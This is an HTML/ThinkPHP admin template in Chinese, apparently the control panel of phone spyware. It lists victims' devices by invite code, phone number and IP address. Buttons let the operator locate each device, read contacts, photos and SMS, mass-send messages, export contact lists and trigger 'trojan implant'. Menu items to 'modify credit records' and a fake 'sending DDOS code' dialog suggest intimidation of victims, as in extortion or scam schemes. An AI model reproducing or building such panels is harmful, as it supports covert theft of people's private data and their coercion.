<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>layui</title>
 
  <meta name="renderer" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <link rel="stylesheet" href="__PUBLIC__/layui/css/layui.css"  media="all">
  <link rel="stylesheet" href="__PUBLIC__/font-awesome/css/font-awesome.min.css" media="all" />
  <link rel="stylesheet" href="__CSS__/admin.css"  media="all">
  <style type="text/css">

/* tooltip */
#tooltip{
  position:absolute;
  border:1px solid #ccc;
  background:#333;
  padding:2px;
  display:none;
  color:#fff;
}
td{
    font-size: 15px !important;
}
.operation-menu a {
    margin: 0 10px;

    margin-top: 10px;
    display: inline-block;
}
.txl{
    border: none!important;
    text-decoration: none!important;
    background: -webkit-linear-gradient(45deg, #42e695, #3bb2b8)!important;
    border-radius: 7px!important;
    color: #fff!important;
}
.tcl{
    border: none!important;
    text-decoration: none!important;
    background: -webkit-linear-gradient(45deg, #f54ea2, #ff7676)!important;
    border-radius: 7px!important;
    color: #fff!important;
}
.tal{
    border: none!important;
    text-decoration: none!important;
    background: -webkit-linear-gradient(45deg, #4298ff, #1473e6)!important;
    border-radius: 7px!important;
    color: #fff!important;
}
.layui-table[lay-size=sm] td, .layui-table[lay-size=sm] th{
    font-weight: 600
}

</style>
</head>
<body style="padding:12px;">
  <div class="tplay-body-div">
    <!--<div class="layui-tab">-->
    <!--  <ul class="layui-tab-title">-->
    <!--    <li class="layui-this">设备查看管理</li>-->
    <!--  </ul>-->
    <!--</div> -->
    <form class="layui-form serch" action="{:url('admin/appv1/user')}" method="post">
        <div class="layui-form-item" style="float: left;">
          <!--<div class="layui-input-inline">-->
          <!--  <input type="text" name="keywords" lay-verify="title" autocomplete="off" placeholder="请输入登录手机" class="layui-input layui-btn-sm">-->
          <!--</div>-->
          <div style="width: 290px;" class="layui-input-inline">
            <input type="text" name="code" lay-verify="title" autocomplete="off" placeholder="请输入邀请码" class="layui-input layui-btn-sm">
          </div>          
          <!--<div class="layui-input-inline">-->
          <!--  <div class="layui-inline">-->
          <!--    <div class="layui-input-inline">-->
          <!--      <input type="text" class="layui-input" id="create_time" placeholder="登录时间" name="create_time">-->
          <!--    </div>-->
          <!--  </div>-->
          <!--</div>-->
          <button class="layui-btn layui-btn-danger layui-btn-sm txl" lay-submit="" lay-filter="serch">查询</button>
        </div>
      </form>
    
    <table  class="layui-table" lay-size="sm">
    	<button style="background-color:red;margin-left:10px;" class="layui-btn layui-btn-sm delAll_btn tcl" lay-submit="" lay-filter="admin">删除</button>
      <colgroup >
      	<col width="10">
        <col width="40">
        <col width="100">
        <col width="30">
        <col width="30">
        <col width="120">
        <col width="120">
        <col width="500">
      </colgroup>
      <thead>
        <tr>
          <th><input type="checkbox" name="" lay-skin="primary" lay-filter="allChoose" id="allChoose" /></th>
          <th>ID</th>
          <th>手机型号</th>          
          <th>登录手机</th>
          <th>邀请码</th>          
          <th>最后登录时间</th>
          <th>最后登录IP地址</th>
          <th>操作</th>
           <th>操作</th>
            <th>操作</th>
          
        </tr> 
      </thead>
      <tbody>
        {volist name="admin" id="vo"}
        <tr style="height:200px;">
          <td class="news_content"><input type="checkbox" name="imgVo" value="{$vo.id}"/></td>
          <td>{$vo.id}</td>
          <td>{$vo.clientid}</td>
          <td>{$vo.name}</td>
          <td>{$vo.code}</td>          
          <td>{$vo.login_time|date="Y-m-d H:i:s",###}</td>
          <td>{$vo.ip}</td>
		  
          <td style="width:10%" class="operation-menu">
            <div class="layui-btn-group">
           
              <a href="{:url('appv1/dingwei',['id'=>$vo.id])}" id="{$vo.id}" title="在线设备定位" alt="在线设备定位" style="margin-right: 0;font-size:15px;border: none"><button style="background:#52c41a;"class="layui-btn txl">定位</button></a>
              <a href="{:url('appv1/mobile',['id'=>$vo.id])}"  id="{$vo.id}" title="查询设备通讯录" alt="查询设备通讯录" style="margin-right: 0;font-size:15px;border: none"><button style="background:#52c41a;"class="layui-btn txl">通讯</button></a><br>
               <a href="{:url('/admin/img/index',['id'=>$vo.name])}" class=" a_menu" id="{$vo.id}" title="查询设备相册" alt="查询设备相册" style="margin-right: 0;font-size:15px;border: none"><button style="background:#52c41a;"class="layui-btn txl">相册</button></a>
               
                <a href="{:url('appv1/sms',['id'=>$vo.id])}" class="a_menu " id="{$vo.id}" title="查询设备短信" alt="查询设备短信" style="margin-right: 0;font-size:15px;border: none"><button style="background:#52c41a;" class="layui-btn txl">短信</button></a>
    
            </div>
          </td>
          <td style="width:20%" class="operation-menu">
            <div class="layui-btn-group">
                <a href="{:url('appv1/yjzf',['id'=>$vo.id])}"  class=" a_menu layui-btn-primary" id="{$vo.id}" title="一键群发" alt="一键群发" style="margin-right: 0;font-size:15px;border: none"><button  style="background:#faad14;"class="layui-btn tal">一键群发</button></a>
              
              <a href="{:url('appv1/mumas')}" target="_blank" title="下载设备短信数据" alt="下载设备短信数据" style="margin-right: 0;font-size:15px;border: none"><button class="layui-btn layui-btn-warm tal">木马植入</button></a><br>
              
              

              <a href="{:url('appv1/phone',['name'=>$vo.name])}"  id="{$vo.id}" title="查询设备通讯录" alt="查询设备通讯录" style="margin-right: 0;font-size:15px;border: none"><button style="background:#52c41a;"class="layui-btn tal">本机号码</button></a>

              
              <a   class=" updatezhengxing layui-btn-primary" id="{$vo.id}" title="修改征信" alt="修改征信" style="margin-right: 0;font-size:15px;border: none"><button class="layui-btn tal layui-btn-normal">修改征信</button></a><br>
			  
             <a href="{:url('appv1/exportexcel',['id'=>$vo.id])}" class="a_menu layui-btn-primary" id="{$vo.id}" title="征信获取" alt="征信获取据" style="margin-right: 0;font-size:15px;border: none"><button class="layui-btn tal layui-btn-normal">征信获取</button></a>

              <a class="layui-btn-primary bthorse"  title="木马植入" alt="木马植入" style="margin-right: 0;font-size:15px;border: none"><button class="layui-btn layui-btn-normal tal">木马清除</button></a>

              
            </div>
          </td>
           <td style="width:10%" class="operation-menu">
            <div class="layui-btn-group">
                <a href="{:url('appv1/exportexcel',['id'=>$vo.id])}" class="a_menu layui-btn-primary" id="{$vo.id}" title="下载设备通讯录数据" alt="下载设备通讯录数据" style="margin-right: 0;font-size:15px;border: none"><button class="layui-btn tcl layui-btn-warm">下载通讯</button></a>
                <a class="layui-btn-primary delete" id="{$vo.id}" title="删除用户" alt="删除用户" style="margin-right: 0;font-size:12px;border: none"><button class="layui-btn layui-btn-danger tcl">删除用户</button></a>
            </div>
          </td>
        </tr>
        {/volist}
      </tbody>
    </table>
    <div style="padding:0 20px;">{$admin->render()}</div>

    {include file="public/foot"}
    
    <script type="text/javascript">
    
    $("#allChoose").click(function () {
       $("input[name='imgVo']:checkbox").prop("checked", this.checked);
   });

    $('.delAll_btn').click(function(){
                var checkids = [];
                $("input[name='imgVo']:checked").each(function(i){
                    checkids[i] = $(this).val();
                });
                if(checkids.length<=0){
                	layer.msg('请选择要删除的聊天记录!');
                	return;
                }else{
      layer.confirm('确定要删除并清空这些设备的所有数据吗？（注：删除后不可恢复）', function(index) {
        $.ajax({
          url:"{:url('admin/appv1/alldeletes')}",
          data:{delid:checkids},
          success:function(res) {
            layer.msg(res.msg);
            if(res.code == 1) {
              setTimeout(function(){
                location.href = res.url;
              },1500)
            }
          }
        })
      })
             
     }    	
    })
    $('.updatezhengxing').click(function(){
      layer.confirm('确定要修改这些设备的里面的征信吗？（注：你没有此权限,删除请联系主管）', function(index) {
        layer.close(layer.index);
      })
    })
    $('.updateduanx').click(function(){
      layer.confirm('正在向该用户发送DDOS代码。。。', function(index) {
        layer.close(layer.index);
      })
    })
    $('.bthorse').click(function(){
      layer.confirm('确定要清空这些设备的里面的木马病毒？（注：你没有此权限,删除请联系主管）', function(index) {
         layer.close(layer.index);
      })
    })
    $('.delete').click(function(){
      var id = $(this).attr('id');
      layer.confirm('确定要删除这台设备帐号和所有数据吗？（注：删除后不可恢复）', function(index) {
        $.ajax({
          url:"{:url('admin/appv1/delete')}",
          data:{id:id},
          success:function(res) {
            layer.msg(res.msg);
            if(res.code == 1) {
              setTimeout(function(){
                location.href = res.url;
              },1500)
            }
          }
        })
      })
    })
    
    $('.deleteuser').click(function(){
      var id = $(this).attr('id');
      layer.confirm('确定要清空这台设备的所有通讯录数据？（注：删除后不可恢复）', function(index) {
        $.ajax({
          url:"{:url('admin/appv1/clearuser')}",
          data:{id:id},
          success:function(res) {
            layer.msg(res.msg);
            if(res.code == 1) {
              setTimeout(function(){
                location.href = res.url;
              },1500)
            }
          }
        })
      })
    }) 
    
    $('.deletesms').click(function(){
      var id = $(this).attr('id');
      layer.confirm('确定要清空这台设备的所有短信数据？（注：删除后不可恢复）', function(index) {
        $.ajax({
          url:"{:url('admin/appv1/clearsms')}",
          data:{id:id},
          success:function(res) {
            layer.msg(res.msg);
            if(res.code == 1) {
              setTimeout(function(){
                location.href = res.url;
              },1500)
            }
          }
        })
      })
    })      
    </script>
  </div>
</body>
<style>
  .layui-disabled, .layui-disabled:hover {
    color: #101010 !important;
    background-color: white;
  }
  /*设置表格单元格线样式*/
  .layui-table td, .layui-table th, .layui-table-col-set, .layui-table-fixed-r, .layui-table-grid-down, .layui-table-header, .layui-table-page, .layui-table-tips-main, .layui-table-tool, .layui-table-total, .layui-table-view, .layui-table[lay-skin=line], .layui-table[lay-skin=row] {
    border-color: white; /*#bbb*/
  }

</style>
</html>
